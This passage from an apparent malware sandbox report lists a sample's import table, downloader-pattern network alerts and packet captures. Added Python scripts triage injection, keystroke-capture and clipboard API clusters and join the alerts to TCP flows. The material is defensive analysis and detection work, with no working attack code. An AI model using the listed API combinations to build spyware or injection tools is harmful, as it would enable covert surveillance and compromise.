                                                  RT_STRING | 0xbc668 | 0x690 | data | English | Great Britain | 0.26964285714285713
                                                  RT_STRING | 0xbccf8 | 0x4d0 | data | English | Great Britain | 0.36363636363636365
                                                  RT_STRING | 0xbd1c8 | 0x5fc | data | English | Great Britain | 0.3087467362924282
                                                  RT_STRING | 0xbd7c8 | 0x65c | data | English | Great Britain | 0.34336609336609336
                                                  RT_STRING | 0xbde28 | 0x388 | data | English | Great Britain | 0.377212389380531
                                                  RT_STRING | 0xbe1b0 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
                                                  RT_GROUP_ICON | 0xbe308 | 0x14 | data | English | Great Britain | 1.25
                                                  RT_GROUP_ICON | 0xbe320 | 0x14 | data | English | Great Britain | 1.15
                                                  RT_GROUP_ICON | 0xbe338 | 0x14 | data | English | Great Britain | 1.25
                                                  RT_GROUP_ICON | 0xbe350 | 0x14 | data | English | Great Britain | 1.25
                                                  RT_VERSION | 0xbe368 | 0x19c | data | English | Great Britain | 0.5339805825242718
                                                  RT_MANIFEST | 0xbe508 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
DLL | Import
WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
USER32.dll | GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
GDI32.dll | DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
OLEAUT32.dll | VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
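Reading an import table like the one above is a triage step: what matters is not any single API but clusters that only make sense together (OpenProcess with VirtualAllocEx and WriteProcessMemory; GetAsyncKeyState with GetKeyboardState and MapVirtualKeyW; OpenClipboard with GetClipboardData; BlockInput beside keybd_event and SendInput). The script below is an added example, not Joe Sandbox code and not code from the sample. IMPORT_TABLE is a constructed excerpt of the rows above in the same "DLL | Import" layout; the capability sets and their thresholds are the editor's own heuristics, not a published rule set.

```python
"""Capability triage over a PE import table.

Added example, not Joe Sandbox code. IMPORT_TABLE is a constructed excerpt of
the "DLL | Import" rows of this report; CAPABILITIES is the editor's own heuristic.
"""
from collections import defaultdict

IMPORT_TABLE = """\
WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
KERNEL32.dll | OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, VirtualFreeEx, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, IsDebuggerPresent, OutputDebugStringW, CreateProcessW, ResumeThread
USER32.dll | GetAsyncKeyState, GetKeyState, GetKeyboardState, SetKeyboardState, MapVirtualKeyW, AttachThreadInput, OpenClipboard, GetClipboardData, EmptyClipboard, CloseClipboard, BlockInput, keybd_event, mouse_event, SendInput
ADVAPI32.dll | OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, DuplicateTokenEx, CreateProcessAsUserW, LogonUserW, RegSetValueExW, RegCreateKeyExW, RegOpenKeyExW, RegQueryValueExW
"""

# Each capability lists APIs that usually travel together; min_hits is how many of
# them must be imported before the capability is reported, so that one common
# API on its own (OpenProcess, say) does not trigger it. Editor's heuristic.
CAPABILITIES = {
    "remote-memory-write": ({"OpenProcess", "VirtualAllocEx", "WriteProcessMemory",
                             "ReadProcessMemory", "CreateRemoteThread", "NtWriteVirtualMemory"}, 3),
    "keystroke-capture": ({"GetAsyncKeyState", "GetKeyState", "GetKeyboardState",
                           "SetWindowsHookExW", "SetWindowsHookExA", "MapVirtualKeyW"}, 2),
    "clipboard-read": ({"OpenClipboard", "GetClipboardData", "CloseClipboard"}, 2),
    "input-blocking-or-synthesis": ({"BlockInput", "keybd_event", "mouse_event", "SendInput"}, 2),
    "debugger-check": ({"IsDebuggerPresent", "CheckRemoteDebuggerPresent",
                        "NtQueryInformationProcess"}, 1),
    "process-enumeration": ({"CreateToolhelp32Snapshot", "Process32FirstW",
                             "Process32NextW", "EnumProcesses"}, 2),
    "token-manipulation": ({"OpenProcessToken", "AdjustTokenPrivileges", "LookupPrivilegeValueW",
                            "DuplicateTokenEx", "CreateProcessAsUserW"}, 3),
    "http-client": ({"InternetOpenW", "InternetConnectW", "HttpOpenRequestW",
                     "HttpSendRequestW", "InternetReadFile", "InternetOpenUrlW"}, 3),
    "raw-sockets": ({"WSAStartup", "socket", "connect", "send", "recv"}, 4),
    "registry-write": ({"RegCreateKeyExW", "RegSetValueExW"}, 2),
}


def parse_import_table(text):
    """Parse 'DLL | func, func, ...' rows into {dll_name_lowercase: set_of_functions}."""
    imports = defaultdict(set)
    for line in text.splitlines():
        if "|" not in line:
            continue
        dll, funcs = line.split("|", 1)
        imports[dll.strip().lower()].update(f.strip() for f in funcs.split(",") if f.strip())
    return dict(imports)


def triage(imports):
    """Return {capability: sorted list of matched APIs} for every capability whose
    min_hits threshold is met by the union of all imported names."""
    present = set().union(*imports.values())
    hits = {}
    for name, (apis, min_hits) in CAPABILITIES.items():
        matched = sorted(apis & present)
        if len(matched) >= min_hits:
            hits[name] = matched
    return hits


if __name__ == "__main__":
    for cap, apis in triage(parse_import_table(IMPORT_TABLE)).items():
        print(f"{cap:28s} {', '.join(apis)}")
```

Every capability in the table fires on this import set, which is exactly why import-based triage is a hint and not a verdict: the same API clusters ship in scripting-runtime stubs, GUI automation tools and remote-administration software. Treat each hit as a question the dynamic analysis has to answer. To run the triage on the binary instead of the report, build the `imports` dict from pefile's `DIRECTORY_ENTRY_IMPORT` entries (each has a `.dll` name and `.imports` with `.name` members) and pass it to `triage`.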
Language of compilation system | Country where language is spoken
English | Great Britain
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-18T15:26:04.128767+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49699 | 132.226.8.169 | 80 | TCP
2024-09-18T15:26:05.113363+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49699 | 132.226.8.169 | 80 | TCP
2024-09-18T15:26:05.694557+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49701 | 188.114.96.3 | 443 | TCP
2024-09-18T15:26:06.597534+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49702 | 132.226.8.169 | 80 | TCP
2024-09-18T15:26:07.306113+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49703 | 188.114.96.3 | 443 | TCP
2024-09-18T15:26:09.776818+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49705 | 188.114.96.3 | 443 | TCP
2024-09-18T15:26:11.401270+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49707 | 188.114.96.3 | 443 | TCP
2024-09-18T15:26:15.101822+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49711 | 188.114.96.3 | 443 | TCP
2024-09-18T15:26:17.097628+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49713 | 132.226.8.169 | 80 | TCP
2024-09-18T15:26:17.610438+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49715 | 188.114.96.3 | 443 | TCP
2024-09-18T15:26:18.050710+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49713 | 132.226.8.169 | 80 | TCP
2024-09-18T15:26:18.618702+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49719 | 188.114.96.3 | 443 | TCP
2024-09-18T15:26:19.628818+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49722 | 132.226.8.169 | 80 | TCP
2024-09-18T15:26:20.863212+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49723 | 188.114.96.3 | 443 | TCP
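The alert rows above and the per-packet list that follows share a join key: the alert's (source port, dest IP, dest port) is the client side of one TCP connection in the packet list. The script below is an added example, not Joe Sandbox output or code from this report. It rebuilds flows from a constructed excerpt of the packet rows (copied from the list below), attaches each alert to its flow on that key, and prints the flows in start order with the gap since the previous flow began, which is where the alternating port-80 / port-443 cadence in this capture becomes visible. Assumptions: the CEST suffix means UTC+2 (consistent with the +0200 offset printed in the alert timestamps), nanosecond fractions are truncated to microseconds, and the lower port of a packet is taken as the server side.

```python
"""Rebuild TCP flows from the report's packet list and join Suricata alerts to them.

Added example, not Joe Sandbox code. PACKETS and ALERTS are constructed excerpts
of the two tables in this report; the CEST -> UTC+2 mapping is an assumption.
"""
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone

PACKETS = """\
Sep 18, 2024 15:26:01.913141966 CEST | 49699 | 80 | 192.168.2.7 | 132.226.8.169
Sep 18, 2024 15:26:01.919121981 CEST | 80 | 49699 | 132.226.8.169 | 192.168.2.7
Sep 18, 2024 15:26:01.919199944 CEST | 49699 | 80 | 192.168.2.7 | 132.226.8.169
Sep 18, 2024 15:26:01.919477940 CEST | 49699 | 80 | 192.168.2.7 | 132.226.8.169
Sep 18, 2024 15:26:03.721055031 CEST | 80 | 49699 | 132.226.8.169 | 192.168.2.7
Sep 18, 2024 15:26:04.119626999 CEST | 49700 | 443 | 192.168.2.7 | 188.114.96.3
Sep 18, 2024 15:26:04.119729996 CEST | 443 | 49700 | 188.114.96.3 | 192.168.2.7
Sep 18, 2024 15:26:04.128767014 CEST | 49699 | 80 | 192.168.2.7 | 132.226.8.169
Sep 18, 2024 15:26:05.079339981 CEST | 49701 | 443 | 192.168.2.7 | 188.114.96.3
Sep 18, 2024 15:26:05.694530964 CEST | 443 | 49701 | 188.114.96.3 | 192.168.2.7
Sep 18, 2024 15:26:05.698904991 CEST | 49702 | 80 | 192.168.2.7 | 132.226.8.169
"""

ALERTS = """\
2024-09-18T15:26:04.128767+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.7 | 49699 | 132.226.8.169 | 80 | TCP
2024-09-18T15:26:05.694557+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49701 | 188.114.96.3 | 443 | TCP
"""

# Assumption: the sandbox clock is Central European Summer Time (UTC+2), which
# agrees with the +0200 offset printed in the alert rows.
TZ = {"CEST": timezone(timedelta(hours=2)), "CET": timezone(timedelta(hours=1))}


@dataclass
class Flow:
    client_port: int
    server_ip: str
    server_port: int
    first: datetime
    last: datetime
    pkts_out: int = 0                            # client -> server
    pkts_in: int = 0                             # server -> client
    alerts: list = field(default_factory=list)   # (timestamp, sid, signature)


def parse_packet_ts(s):
    """'Sep 18, 2024 15:26:01.913141966 CEST' -> aware datetime; ns truncated to us."""
    body, tz = s.rsplit(" ", 1)
    head, frac = body.rsplit(".", 1)
    dt = datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")
    return dt.replace(tzinfo=TZ.get(tz, timezone.utc))


def flow_key(sport, dport, sip, dip):
    """Canonical (client_port, server_ip, server_port) key plus packet direction.
    The lower port is treated as the server, so both directions map to one key."""
    if sport < dport:
        return (dport, sip, sport), "in"
    return (sport, dip, dport), "out"


def build_flows(packets_text):
    flows = {}
    for line in packets_text.splitlines():
        ts, sport, dport, sip, dip = [f.strip() for f in line.split("|")]
        t = parse_packet_ts(ts)
        key, direction = flow_key(int(sport), int(dport), sip, dip)
        fl = flows.get(key)
        if fl is None:
            fl = flows[key] = Flow(*key, first=t, last=t)
        fl.first, fl.last = min(fl.first, t), max(fl.last, t)
        if direction == "out":
            fl.pkts_out += 1
        else:
            fl.pkts_in += 1
    return flows


def attach_alerts(flows, alerts_text):
    """Join alerts to flows on the shared key; returns (matched, unmatched) counts."""
    matched = unmatched = 0
    for line in alerts_text.splitlines():
        ts, sid, sig, _sev, sip, sport, dip, dport, _proto = [f.strip() for f in line.split("|")]
        key, _ = flow_key(int(sport), int(dport), sip, dip)
        fl = flows.get(key)
        if fl is None:
            unmatched += 1
            continue
        fl.alerts.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"), int(sid), sig))
        matched += 1
    return matched, unmatched


def timeline(flows):
    """Flows in start order, each with the seconds elapsed since the previous flow began."""
    rows, prev = [], None
    for fl in sorted(flows.values(), key=lambda f: f.first):
        gap = (fl.first - prev.first).total_seconds() if prev else 0.0
        rows.append({"client_port": fl.client_port,
                     "server": f"{fl.server_ip}:{fl.server_port}",
                     "start": fl.first.time().isoformat(),
                     "gap_s": round(gap, 3), "out": fl.pkts_out, "in": fl.pkts_in,
                     "sids": [sid for _, sid, _ in fl.alerts]})
        prev = fl
    return rows


if __name__ == "__main__":
    flows = build_flows(PACKETS)
    print("alerts matched/unmatched:", attach_alerts(flows, ALERTS))
    for row in timeline(flows):
        print(row)
```

On the excerpt, each flow is a single short exchange (a few packets, under a second of server activity) before the next ephemeral port opens to the other server, and both alerts land on the flow they belong to. Run the same functions over the complete packet list and the full alert table to check whether the port-80 and port-443 flows keep alternating and whether their start gaps settle on a fixed interval; an unmatched alert count above zero means the alert fired on a connection the packet list does not contain, which is worth reconciling before drawing conclusions.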
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 18, 2024 15:26:01.913141966 CEST | 49699 | 80 | 192.168.2.7 | 132.226.8.169
Sep 18, 2024 15:26:01.919121981 CEST | 80 | 49699 | 132.226.8.169 | 192.168.2.7
Sep 18, 2024 15:26:01.919199944 CEST | 49699 | 80 | 192.168.2.7 | 132.226.8.169
Sep 18, 2024 15:26:01.919477940 CEST | 49699 | 80 | 192.168.2.7 | 132.226.8.169
Sep 18, 2024 15:26:01.925282955 CEST | 80 | 49699 | 132.226.8.169 | 192.168.2.7
Sep 18, 2024 15:26:03.721055031 CEST | 80 | 49699 | 132.226.8.169 | 192.168.2.7
Sep 18, 2024 15:26:03.773596048 CEST | 49699 | 80 | 192.168.2.7 | 132.226.8.169
Sep 18, 2024 15:26:03.776456118 CEST | 49699 | 80 | 192.168.2.7 | 132.226.8.169
Sep 18, 2024 15:26:03.781392097 CEST | 80 | 49699 | 132.226.8.169 | 192.168.2.7
Sep 18, 2024 15:26:04.072740078 CEST | 80 | 49699 | 132.226.8.169 | 192.168.2.7
Sep 18, 2024 15:26:04.119626999 CEST | 49700 | 443 | 192.168.2.7 | 188.114.96.3
Sep 18, 2024 15:26:04.119729996 CEST | 443 | 49700 | 188.114.96.3 | 192.168.2.7
Sep 18, 2024 15:26:04.119813919 CEST | 49700 | 443 | 192.168.2.7 | 188.114.96.3
Sep 18, 2024 15:26:04.127438068 CEST | 49700 | 443 | 192.168.2.7 | 188.114.96.3
Sep 18, 2024 15:26:04.127475023 CEST | 443 | 49700 | 188.114.96.3 | 192.168.2.7
Sep 18, 2024 15:26:04.128767014 CEST | 49699 | 80 | 192.168.2.7 | 132.226.8.169
Sep 18, 2024 15:26:04.599597931 CEST | 443 | 49700 | 188.114.96.3 | 192.168.2.7
Sep 18, 2024 15:26:04.599689960 CEST | 49700 | 443 | 192.168.2.7 | 188.114.96.3
Sep 18, 2024 15:26:04.610685110 CEST | 49700 | 443 | 192.168.2.7 | 188.114.96.3
Sep 18, 2024 15:26:04.610755920 CEST | 443 | 49700 | 188.114.96.3 | 192.168.2.7
Sep 18, 2024 15:26:04.611150026 CEST | 443 | 49700 | 188.114.96.3 | 192.168.2.7
Sep 18, 2024 15:26:04.660022974 CEST | 49700 | 443 | 192.168.2.7 | 188.114.96.3
Sep 18, 2024 15:26:04.668967962 CEST | 49700 | 443 | 192.168.2.7 | 188.114.96.3
Sep 18, 2024 15:26:04.711405993 CEST | 443 | 49700 | 188.114.96.3 | 192.168.2.7
Sep 18, 2024 15:26:04.789135933 CEST | 443 | 49700 | 188.114.96.3 | 192.168.2.7
Sep 18, 2024 15:26:04.789231062 CEST | 443 | 49700 | 188.114.96.3 | 192.168.2.7
Sep 18, 2024 15:26:04.789285898 CEST | 49700 | 443 | 192.168.2.7 | 188.114.96.3
Sep 18, 2024 15:26:04.795799971 CEST | 49700 | 443 | 192.168.2.7 | 188.114.96.3
Sep 18, 2024 15:26:04.800056934 CEST | 49699 | 80 | 192.168.2.7 | 132.226.8.169
Sep 18, 2024 15:26:04.805105925 CEST | 80 | 49699 | 132.226.8.169 | 192.168.2.7
Sep 18, 2024 15:26:05.072067022 CEST | 80 | 49699 | 132.226.8.169 | 192.168.2.7
Sep 18, 2024 15:26:05.079339981 CEST | 49701 | 443 | 192.168.2.7 | 188.114.96.3
Sep 18, 2024 15:26:05.079396963 CEST | 443 | 49701 | 188.114.96.3 | 192.168.2.7
Sep 18, 2024 15:26:05.079518080 CEST | 49701 | 443 | 192.168.2.7 | 188.114.96.3
Sep 18, 2024 15:26:05.079756021 CEST | 49701 | 443 | 192.168.2.7 | 188.114.96.3
Sep 18, 2024 15:26:05.079777002 CEST | 443 | 49701 | 188.114.96.3 | 192.168.2.7
Sep 18, 2024 15:26:05.113363028 CEST | 49699 | 80 | 192.168.2.7 | 132.226.8.169
Sep 18, 2024 15:26:05.544203043 CEST | 443 | 49701 | 188.114.96.3 | 192.168.2.7
Sep 18, 2024 15:26:05.546488047 CEST | 49701 | 443 | 192.168.2.7 | 188.114.96.3
Sep 18, 2024 15:26:05.546521902 CEST | 443 | 49701 | 188.114.96.3 | 192.168.2.7
Sep 18, 2024 15:26:05.694530964 CEST | 443 | 49701 | 188.114.96.3 | 192.168.2.7
Sep 18, 2024 15:26:05.694612980 CEST | 443 | 49701 | 188.114.96.3 | 192.168.2.7
Sep 18, 2024 15:26:05.694911957 CEST | 49701 | 443 | 192.168.2.7 | 188.114.96.3
Sep 18, 2024 15:26:05.695193052 CEST | 49701 | 443 | 192.168.2.7 | 188.114.96.3
Sep 18, 2024 15:26:05.698904991 CEST | 49702 | 80 | 192.168.2.7 | 132.226.8.169
Sep 18, 2024 15:26:05.698905945 CEST | 49699 | 80 | 192.168.2.7 | 132.226.8.169
Sep 18, 2024 15:26:05.704015017 CEST | 80 | 49699 | 132.226.8.169 | 192.168.2.7
Sep 18, 2024 15:26:05.704106092 CEST | 49699 | 80 | 192.168.2.7 | 132.226.8.169
Sep 18, 2024 15:26:05.704180002 CEST | 80 | 49702 | 132.226.8.169 | 192.168.2.7
Sep 18, 2024 15:26:05.704499006 CEST | 49702 | 80 | 192.168.2.7 | 132.226.8.169
Sep 18, 2024 15:26:05.704499006 CEST | 49702 | 80 | 192.168.2.7 | 132.226.8.169
Sep 18, 2024 15:26:05.709315062 CEST | 80 | 49702 | 132.226.8.169 | 192.168.2.7
Sep 18, 2024 15:26:06.548098087 CEST | 80 | 49702 | 132.226.8.169 | 192.168.2.7
Sep 18, 2024 15:26:06.549506903 CEST | 49703 | 443 | 192.168.2.7 | 188.114.96.3
Sep 18, 2024 15:26:06.549591064 CEST | 443 | 49703 | 188.114.96.3 | 192.168.2.7
Sep 18, 2024 15:26:06.549664021 CEST | 49703 | 443 | 192.168.2.7 | 188.114.96.3
Sep 18, 2024 15:26:06.549961090 CEST | 49703 | 443 | 192.168.2.7 | 188.114.96.3
Sep 18, 2024 15:26:06.549998045 CEST | 443 | 49703 | 188.114.96.3 | 192.168.2.7
Sep 18, 2024 15:26:06.597533941 CEST | 49702 | 80 | 192.168.2.7 | 132.226.8.169
Sep 18, 2024 15:26:07.028172016 CEST | 443 | 49703 | 188.114.96.3 | 192.168.2.7
Sep 18, 2024 15:26:07.037805080 CEST | 49703 | 443 | 192.168.2.7 | 188.114.96.3
Sep 18, 2024 15:26:07.037858963 CEST | 443 | 49703 | 188.114.96.3 | 192.168.2.7
Sep 18, 2024 15:26:07.306087017 CEST | 443 | 49703 | 188.114.96.3 | 192.168.2.7
Sep 18, 2024 15:26:07.306160927 CEST | 443 | 49703 | 188.114.96.3 | 192.168.2.7
